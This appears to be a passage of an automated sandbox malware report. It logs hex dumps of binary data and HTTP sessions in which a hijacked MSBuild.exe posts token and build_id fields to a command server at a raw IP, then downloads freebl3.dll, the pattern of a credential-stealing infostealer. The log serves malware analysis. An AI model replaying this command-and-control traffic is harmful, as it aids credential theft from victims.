                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                                        Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                                        Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                        Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                                        2024-05-24 08:27:11 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                                        Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                                        2024-05-24 08:27:12 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                                        Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                                        2024-05-24 08:27:12 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                                        Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                                        2024-05-24 08:27:12 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                                        Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.44975178.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:14 UTC279OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----ECGIIIDAKJDHJKFHIEBF
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 4677
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:14 UTC4677OUTData Raw: 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 45 43 47 49 49 49 44 41 4b 4a 44 48 4a 4b 46 48 49 45 42 46 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------ECGIIIDAKJDHJKFHIEBFContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------ECGIIIDAKJDHJKFHIEBFCont
                                                                                        2024-05-24 08:27:15 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:15 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:15 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.44975278.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:16 UTC279OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----HIDHDGDHJEGHIDGDHCGC
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 1529
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:16 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 44 47 44 48 4a 45 47 48 49 44 47 44 48 43 47 43 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------HIDHDGDHJEGHIDGDHCGCContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------HIDHDGDHJEGHIDGDHCGCCont
                                                                                        2024-05-24 08:27:16 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:16 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:16 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.44975378.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:16 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----HDAAAAFIIJDBGDGCGDAK
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 437
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:16 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 48 44 41 41 41 41 46 49 49 4a 44 42 47 44 47 43 47 44 41 4b 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------HDAAAAFIIJDBGDGCGDAKContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------HDAAAAFIIJDBGDGCGDAKCont
                                                                                        2024-05-24 08:27:17 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:17 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:17 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.44975478.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:17 UTC278OUTPOST / HTTP/1.1
                                                                                        Content-Type: multipart/form-data; boundary=----FIJECAEHJJJKJKFIDGCB
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Content-Length: 437
                                                                                        Connection: Keep-Alive
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:17 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 39 39 36 35 37 32 62 63 65 64 65 33 38 35 30 31 63 61 37 30 31 38 39 31 63 34 62 39 65 64 36 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 61 32 65 33 33 34 30 66 37 66 36 34 30 30 38 34 30 31 66 61 35 37 38 37 61 38 38 32 61 66 34 35 0d 0a 2d 2d 2d 2d 2d 2d 46 49 4a 45 43 41 45 48 4a 4a 4a 4b 4a 4b 46 49 44 47 43 42 0d 0a 43 6f 6e 74
                                                                                        Data Ascii: ------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="token"3996572bcede38501ca701891c4b9ed6------FIJECAEHJJJKJKFIDGCBContent-Disposition: form-data; name="build_id"a2e3340f7f64008401fa5787a882af45------FIJECAEHJJJKJKFIDGCBCont
                                                                                        2024-05-24 08:27:18 UTC158INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:18 GMT
                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        2024-05-24 08:27:18 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                        Data Ascii: 2ok0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.44975678.47.123.1744436712C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-05-24 08:27:18 UTC173OUTGET /freebl3.dll HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                                        Host: 78.47.123.174
                                                                                        Cache-Control: no-cache
                                                                                        2024-05-24 08:27:19 UTC246INHTTP/1.1 200 OK
                                                                                        Server: nginx
                                                                                        Date: Fri, 24 May 2024 08:27:19 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 685392
                                                                                        Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                                        Connection: close
                                                                                        ETag: "6315a9f4-a7550"
                                                                                        Accept-Ranges: bytes
                                                                                        2024-05-24 08:27:19 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                                        Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                                        Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                                        Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                                        Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                                        2024-05-24 08:27:19 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                                        Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
